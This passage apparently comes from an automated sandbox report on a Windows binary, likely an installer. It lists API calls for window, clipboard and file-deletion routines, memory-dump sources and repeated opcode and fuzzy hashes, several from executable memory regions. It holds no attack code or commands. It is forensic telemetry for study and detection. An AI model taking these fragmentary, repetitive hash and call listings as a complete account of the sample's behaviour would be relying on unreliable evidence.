                                                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BBB
                                                                                • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404BE6
                                                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BFA
                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 00404C29
                                                                                • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C37
                                                                                • ShowWindow.USER32(?,00000005), ref: 00404C48
                                                                                • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D45
                                                                                • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DAA
                                                                                • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404DBF
                                                                                • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404DE3
                                                                                • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E03
                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404E18
                                                                                • GlobalFree.KERNEL32(?), ref: 00404E28
                                                                                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EA1
                                                                                • SendMessageA.USER32(?,00001102,?,?), ref: 00404F4A
                                                                                • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404F59
                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F79
                                                                                • ShowWindow.USER32(?,00000000), ref: 00404FC7
                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00404FD2
                                                                                • ShowWindow.USER32(00000000), ref: 00404FD9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                • String ID: $M$N
                                                                                • API String ID: 1638840714-813528018
                                                                                • Opcode ID: 15a37990a4bcb7d4f00004ad7ffbb4e2a3366f8b7a6d6f4bc83ccadd7c11290a
                                                                                • Instruction ID: 3cd80f6d66a0a8d02be1144e931921fec7cdafd03fadcad4e17be0217faf115b
                                                                                • Opcode Fuzzy Hash: 15a37990a4bcb7d4f00004ad7ffbb4e2a3366f8b7a6d6f4bc83ccadd7c11290a
                                                                                • Instruction Fuzzy Hash: 9D026EB0900209AFEB10DF94DD85AAE7BB5FB84315F10813AF611B62E1C7789E42DF58
                                                                                APIs
                                                                                • DeleteFileA.KERNEL32(?,?,75DF3410,75DF2EE0,00000000), ref: 0040572E
                                                                                • lstrcatA.KERNEL32(00420D38,\*.*,00420D38,?,?,75DF3410,75DF2EE0,00000000), ref: 00405776
                                                                                • lstrcatA.KERNEL32(?,00409014,?,00420D38,?,?,75DF3410,75DF2EE0,00000000), ref: 00405797
                                                                                • lstrlenA.KERNEL32(?,?,00409014,?,00420D38,?,?,75DF3410,75DF2EE0,00000000), ref: 0040579D
                                                                                • FindFirstFileA.KERNEL32(00420D38,?,?,?,00409014,?,00420D38,?,?,75DF3410,75DF2EE0,00000000), ref: 004057AE
                                                                                • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 0040585B
                                                                                • FindClose.KERNEL32(00000000), ref: 0040586C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Similarity
                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                • String ID: 8B$\*.*
                                                                                • API String ID: 2035342205-1085368084
                                                                                • Opcode ID: ea9ce5b97ce8e4b443abb3ca9957b13dd705908b98673029f699f8bd1230974e
                                                                                • Instruction ID: 0bcf9a9e67a33d50b3dc7b196bcae3add4761e648fc1c1af8ecd3a5bcda4d25e
                                                                                • Opcode Fuzzy Hash: ea9ce5b97ce8e4b443abb3ca9957b13dd705908b98673029f699f8bd1230974e
                                                                                • Instruction Fuzzy Hash: 8F51A331800A08BADF217B658C89BAF7B78DF46754F14807BF851761D2C73C8991DEAA
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a0a3870b215c6cb57f5be28c47361f52d581e4686ba2b9b0247380936f8f490c
                                                                                • Instruction ID: 4218cb5ebcdace98cdb1216374bea5ca06482cd82b52ee1cf8be947d1aeb6f3c
                                                                                • Opcode Fuzzy Hash: a0a3870b215c6cb57f5be28c47361f52d581e4686ba2b9b0247380936f8f490c
                                                                                • Instruction Fuzzy Hash: 29F17570D00269CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D3785A96CF44
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f3c4be20ea2d21aceeb30aac573cebd4b16f6075c02629ee9ae67523dace6691
                                                                                • Instruction ID: 898196d0ac65eda4a56088410a216f298faf89da6f8279dc7d0527827552cdf9
                                                                                • Opcode Fuzzy Hash: f3c4be20ea2d21aceeb30aac573cebd4b16f6075c02629ee9ae67523dace6691
                                                                                • Instruction Fuzzy Hash: 4B527974A01228CFDB68DF69D884B9DBBB2BB89301F1081EAD409A7355DB359E85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e87964f248d83673a317979147e9908add66114d60d258e26e116edaa86304d6
                                                                                • Instruction ID: ed4e6a9914917ee2b906a6efb5c4b8dc54f7f68f0ce06a99ead7d5b3b0f4503e
                                                                                • Opcode Fuzzy Hash: e87964f248d83673a317979147e9908add66114d60d258e26e116edaa86304d6
                                                                                • Instruction Fuzzy Hash: 68C1C074E00218CFEB54DFA9C980BDDBBB2AF89304F2081A9D419AB355DB355E85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0eb83b827fa8a5510a561aba0a616a7d1e912177f299e2efe0149cecedab0506
                                                                                • Instruction ID: 6eddb3a6d29e282a30b38bd0b9e6cb615ebd87f0b62fd7e394bf5ad509d12876
                                                                                • Opcode Fuzzy Hash: 0eb83b827fa8a5510a561aba0a616a7d1e912177f299e2efe0149cecedab0506
                                                                                • Instruction Fuzzy Hash: 22C1C074E00218CFEB54DFA9C980BDDBBB2AF89304F2081A9D418AB355DB355E81CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b3b0bc0cb96f77c744dfb56714ec15561ee14a5ca673cb35980089f56aa7b128
                                                                                • Instruction ID: 986a4855886bfd40e48cf95e1f26fd4baf63d4c46a98d55b4271ac5e6e99e6c0
                                                                                • Opcode Fuzzy Hash: b3b0bc0cb96f77c744dfb56714ec15561ee14a5ca673cb35980089f56aa7b128
                                                                                • Instruction Fuzzy Hash: B3C1C074E00218CFEB54DFA9C880BDDBBB2AF89304F2081A9D819AB355DB355E85CF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 17e3bb3ec90173ffb1210ca61884de08a12f99098afe762b3db2fa89c88bba81
                                                                                • Instruction ID: 3dd18d492e18578101efefa017a2a85030cf044f5cac948042a98fae3a309b46
                                                                                • Opcode Fuzzy Hash: 17e3bb3ec90173ffb1210ca61884de08a12f99098afe762b3db2fa89c88bba81
                                                                                • Instruction Fuzzy Hash: D4C1C274E00218CFEB54DFA9C980BDDBBB2AF89304F2081A9D419AB355DB355E85CF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8abcd45763649c89053ea4ad4194712e36e3bedc06d788191a8e4e7f7426aa7e
                                                                                • Instruction ID: cd993827274ddf66fae383263907567f2f2da2507aca95f138ae378a7ba30d9f
                                                                                • Opcode Fuzzy Hash: 8abcd45763649c89053ea4ad4194712e36e3bedc06d788191a8e4e7f7426aa7e
                                                                                • Instruction Fuzzy Hash: 72C1C074E00218CFEB54DFA9C980BDDBBB2AF89304F2081A9D419AB355DB359E81CF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ce0d5754b2f863323169fbec56761c803b4b92dcdc3af372e76bd0478f0928b6
                                                                                • Instruction ID: ff4098870b3759e9e8d514db626a136aea753884444cb2ac4ec5088b031474d5
                                                                                • Opcode Fuzzy Hash: ce0d5754b2f863323169fbec56761c803b4b92dcdc3af372e76bd0478f0928b6
                                                                                • Instruction Fuzzy Hash: 72C1C174E00218CFEB54DFA9D880BDDBBB2AF89304F2081A9D418AB355DB359E85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 12a9e6b916128e241882cf07cad93cbf1ca27ed5975ba9ab7c8c0446e328e04a
                                                                                • Instruction ID: 7e4f6d8accffa34aa2c7a58e624425db7b4efbb30cd11fdfa9e66e6e1829ec28
                                                                                • Opcode Fuzzy Hash: 12a9e6b916128e241882cf07cad93cbf1ca27ed5975ba9ab7c8c0446e328e04a
                                                                                • Instruction Fuzzy Hash: B3C1C074E00218CFEB54DFA9D880BDDBBB2AF89300F2081A9D419AB355DB359E81CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8ebaac277a576bba373e14c886841efab18234a53d8f3fe6d5b39edef07f28c5
                                                                                • Instruction ID: 6b2e414473488e030ac4e2c2ddd66a6883ef44c5e769e07ebab39dbd6855a90c
                                                                                • Opcode Fuzzy Hash: 8ebaac277a576bba373e14c886841efab18234a53d8f3fe6d5b39edef07f28c5
                                                                                • Instruction Fuzzy Hash: 09C1C074E00218CFEB54DFA9C980BDDBBB2AF89304F2081A9D419AB355DB359E85CF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d87bc2544e97a914255c26a29df049b4e5343db5ee38330b2d1c7567a5d53c42
                                                                                • Instruction ID: 2d1dd8a0ae93d5c3af8adf8df085a7a4d894945d7d63e1414abbd4ba406dace6
                                                                                • Opcode Fuzzy Hash: d87bc2544e97a914255c26a29df049b4e5343db5ee38330b2d1c7567a5d53c42
                                                                                • Instruction Fuzzy Hash: EAC1C074E00218CFEB54DFA9C980BDDBBB2AF89304F2081A9D418AB355DB359E85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d8c369193e330389c8521fc07add6d366bddae1f78e0a8b119d39579bfe8daa4
                                                                                • Instruction ID: d5cb0c034cdb54f576d671957188cf65096877d8f1eb405128a9d16e6e7515c4
                                                                                • Opcode Fuzzy Hash: d8c369193e330389c8521fc07add6d366bddae1f78e0a8b119d39579bfe8daa4
                                                                                • Instruction Fuzzy Hash: E5C1C174E00218CFEB54DFA9C980BDDBBB2AF89304F2081A9D818AB355DB355E85CF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3c3ae344999221ab553ce338ff3a4ebf590ebaf58737b2bead020341ac18c8bb
                                                                                • Instruction ID: 0ce0eebddfba93ff9b754b870e66cdae5457e9a68e9f2785e9366348102586b1
                                                                                • Opcode Fuzzy Hash: 3c3ae344999221ab553ce338ff3a4ebf590ebaf58737b2bead020341ac18c8bb
                                                                                • Instruction Fuzzy Hash: 71C1C274E00218CFEB54DFA9D980BDDBBB2AF89304F2081A9D419AB355DB359E85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9a5310665ecd15be727339190749a2bbf917039795868b54813b681b9442a651
                                                                                • Instruction ID: 6d7e60b429d692315a397b1f286e6dd511069ae0304b8ad96c091aa602a69fa4
                                                                                • Opcode Fuzzy Hash: 9a5310665ecd15be727339190749a2bbf917039795868b54813b681b9442a651
                                                                                • Instruction Fuzzy Hash: 18C1C074E00218CFEB54DFA9C880BDDBBB2AF89304F2081A9D419AB355DB359E85CF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ad4834b9227045eef8c81c924ea55d454ca23ba72f754fc105db9ae674b7a43d
                                                                                • Instruction ID: 078824f1234501933eec4bdd862e3740af90d3c0b031f8c2afe43306ed8d8315
                                                                                • Opcode Fuzzy Hash: ad4834b9227045eef8c81c924ea55d454ca23ba72f754fc105db9ae674b7a43d
                                                                                • Instruction Fuzzy Hash: 56C1C274E00218CFEB54DFA9D880BDDBBB2AF89304F2081A9D419AB355DB355E81CF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1889d8bf0edf315f1524facdac0e374b2b37518fcebb75b693a476fb499a40ce
                                                                                • Instruction ID: 6a270467da62944e293f685e74311b29112a80eae003276105bf3634194e903c
                                                                                • Opcode Fuzzy Hash: 1889d8bf0edf315f1524facdac0e374b2b37518fcebb75b693a476fb499a40ce
                                                                                • Instruction Fuzzy Hash: 75C1C174E01218CFEB54DFA9C890BDDBBB2AF89304F2081A9D418AB365DB355E81CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9452d391d8ab84e3b1229259f3e0e2ae0b3f05632ee35a0854507cd76d538d96
                                                                                • Instruction ID: 98cb8f0d8af32fdc09d945d0e4818d0a35a25a6eac1ec03062e2ef287b99e081
                                                                                • Opcode Fuzzy Hash: 9452d391d8ab84e3b1229259f3e0e2ae0b3f05632ee35a0854507cd76d538d96
                                                                                • Instruction Fuzzy Hash: 2EC1C074E00218CFEB54DFA9D880BDDBBB2AF89304F2081A9D419AB355DB355E81CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 59f78c17849c2590e95e4ea3113e761a7f0ee07998fab854b68d8dd0e361fbb7
                                                                                • Instruction ID: 14a4ae4a4d931296df3b7a163598ce525ace3724baf45225239f39bf7a87a004
                                                                                • Opcode Fuzzy Hash: 59f78c17849c2590e95e4ea3113e761a7f0ee07998fab854b68d8dd0e361fbb7
                                                                                • Instruction Fuzzy Hash: C9C1C074E00218CFEB54DFA9C980BDDBBB2AF89304F2081A9D419AB355DB359E85CF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bd58af521934b69372667302048a2699eddfab44531ce2a9075d4eb14acba00a
                                                                                • Instruction ID: 4dd2e4f5198b9f5ebff29be33b7787c46e360a1b36692362dfb9d53eced24be2
                                                                                • Opcode Fuzzy Hash: bd58af521934b69372667302048a2699eddfab44531ce2a9075d4eb14acba00a
                                                                                • Instruction Fuzzy Hash: 6CC1C174E00218CFEB54DFA9C980BDDBBB2AF89304F2081A9D819AB355DB355E85CF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 88802c717c3426af175d9ed864b8b11f7b1b0be55a7d70769d1c402bc749ba99
                                                                                • Instruction ID: b281271eb373b16f876ca86c771d43432007731c470689da022c1760794c59f2
                                                                                • Opcode Fuzzy Hash: 88802c717c3426af175d9ed864b8b11f7b1b0be55a7d70769d1c402bc749ba99
                                                                                • Instruction Fuzzy Hash: 30C1C074E00218CFEB54DFA9D980BDDBBB2AF89304F2081A9D418AB355DB359E85CF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ddbd0a5b1db65943a33bd2d9cc4d539f5618af49b3e64ccf398d35656bd60f2d
                                                                                • Instruction ID: 654bdabaa753fe8758720d369839e76275f3350ac2b7b25a6bdeab228eb18998
                                                                                • Opcode Fuzzy Hash: ddbd0a5b1db65943a33bd2d9cc4d539f5618af49b3e64ccf398d35656bd60f2d
                                                                                • Instruction Fuzzy Hash: E9C1C174E00218CFEB54DFA9D980BDDBBB2AF89304F2081A9D418AB355DB359E85CF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fbe76bfd7c1b865df81aef223dd0cbbf5f7cc5fb187f5e05923977776e20f916
                                                                                • Instruction ID: 46a45ee9515db212fec6bf93e2a37d830fe6cafd19834e023ecbfcf22a705f44
                                                                                • Opcode Fuzzy Hash: fbe76bfd7c1b865df81aef223dd0cbbf5f7cc5fb187f5e05923977776e20f916
                                                                                • Instruction Fuzzy Hash: 8EC1C274E00218CFEB54DFA9D880BDDBBB2AF89304F2081A9D418AB355DB355E85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 151f535e79968c1835cbb16653b3197ec7f57a186aedc8689d447138a975b1e6
                                                                                • Instruction ID: a5f4612cf935b2ff4894f3bf2d7b31f74210aae5b4487dd6d49d1caf82bc93b4
                                                                                • Opcode Fuzzy Hash: 151f535e79968c1835cbb16653b3197ec7f57a186aedc8689d447138a975b1e6
                                                                                • Instruction Fuzzy Hash: DAC1C074E00218CFEB54DFA9C980BDDBBB2AF89304F2081A9D419AB355DB359E85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 49e31bb549ed9fd069efe82b0db2b144022c95a0a22065f62def7b905ab8f34f
                                                                                • Instruction ID: 2eac8c0f6afc1e0f6adfc76222a827aaaee8078a98b7930cb93d20478575ad47
                                                                                • Opcode Fuzzy Hash: 49e31bb549ed9fd069efe82b0db2b144022c95a0a22065f62def7b905ab8f34f
                                                                                • Instruction Fuzzy Hash: A9C1C174E00218CFEB54DFA9C980BDDBBB2AF89304F2081A9D418AB355DB355E85CF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: eecad022db43d4959723c35db37d4d8f191634cb945c21da77cead00098dc57c
                                                                                • Instruction ID: a9ce86a163986b0fdf57f49aaa1247bcd6cb66366096e3d74788cb274517c6fe
                                                                                • Opcode Fuzzy Hash: eecad022db43d4959723c35db37d4d8f191634cb945c21da77cead00098dc57c
                                                                                • Instruction Fuzzy Hash: E7C1C074E00218CFEB54DFA9D980BDDBBB2AF89304F2081A9D418AB355DB355E85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 705abb3c735d6be48724b942372fbb7f686366487e83384a684881dc56506b70
                                                                                • Instruction ID: c04cb3fb204145029c5260b792cc02d454ed78b9542d7b94222ea37608add23e
                                                                                • Opcode Fuzzy Hash: 705abb3c735d6be48724b942372fbb7f686366487e83384a684881dc56506b70
                                                                                • Instruction Fuzzy Hash: 25C1C174E00218CFEB54DFA9D880BDDBBB2AF89304F2081A9D819AB355DB355E85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,00000403), ref: 00405219
                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00405228
                                                                                • GetClientRect.USER32(?,?), ref: 00405265
                                                                                • GetSystemMetrics.USER32(00000002), ref: 0040526C
                                                                                • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040528D
                                                                                • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040529E
                                                                                • SendMessageA.USER32(?,00001001,00000000,?), ref: 004052B1
                                                                                • SendMessageA.USER32(?,00001026,00000000,?), ref: 004052BF
                                                                                • SendMessageA.USER32(?,00001024,00000000,?), ref: 004052D2
                                                                                • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004052F4
                                                                                • ShowWindow.USER32(?,00000008), ref: 00405308
                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405329
                                                                                • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405339
                                                                                • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405352
                                                                                • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040535E
                                                                                • GetDlgItem.USER32(?,000003F8), ref: 00405237
                                                                                  • Part of subcall function 0040407D: SendMessageA.USER32(00000028,?,00000001,00403EAE), ref: 0040408B
                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040537A
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000514E,00000000), ref: 00405388
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040538F
                                                                                • ShowWindow.USER32(00000000), ref: 004053B2
                                                                                • ShowWindow.USER32(?,00000008), ref: 004053B9
                                                                                • ShowWindow.USER32(00000008), ref: 004053FF
                                                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405433
                                                                                • CreatePopupMenu.USER32 ref: 00405444
                                                                                • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405459
                                                                                • GetWindowRect.USER32(?,000000FF), ref: 00405479
                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405492
                                                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054CE
                                                                                • OpenClipboard.USER32(00000000), ref: 004054DE
                                                                                • EmptyClipboard.USER32 ref: 004054E4
                                                                                • GlobalAlloc.KERNEL32(00000042,?), ref: 004054ED
                                                                                • GlobalLock.KERNEL32(00000000), ref: 004054F7
                                                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040550B
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405524
                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 0040552F
                                                                                • CloseClipboard.USER32 ref: 00405535
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                • String ID:
                                                                                • API String ID: 590372296-0
                                                                                APIs
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BB1
                                                                                • ShowWindow.USER32(?), ref: 00403BCE
                                                                                • DestroyWindow.USER32 ref: 00403BE2
                                                                                • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BFE
                                                                                • GetDlgItem.USER32(?,?), ref: 00403C1F
                                                                                • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C33
                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403C3A
                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403CE8
                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403CF2
                                                                                • SetClassLongA.USER32(?,000000F2,?), ref: 00403D0C
                                                                                • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D5D
                                                                                • GetDlgItem.USER32(?,00000003), ref: 00403E03
                                                                                • ShowWindow.USER32(00000000,?), ref: 00403E24
                                                                                • EnableWindow.USER32(?,?), ref: 00403E36
                                                                                • EnableWindow.USER32(?,?), ref: 00403E51
                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E67
                                                                                • EnableMenuItem.USER32(00000000), ref: 00403E6E
                                                                                • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E86
                                                                                • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E99
                                                                                • lstrlenA.KERNEL32(0041FD30,?,0041FD30,00422F20), ref: 00403EC2
                                                                                • SetWindowTextA.USER32(?,0041FD30), ref: 00403ED1
                                                                                • ShowWindow.USER32(?,0000000A), ref: 00404005
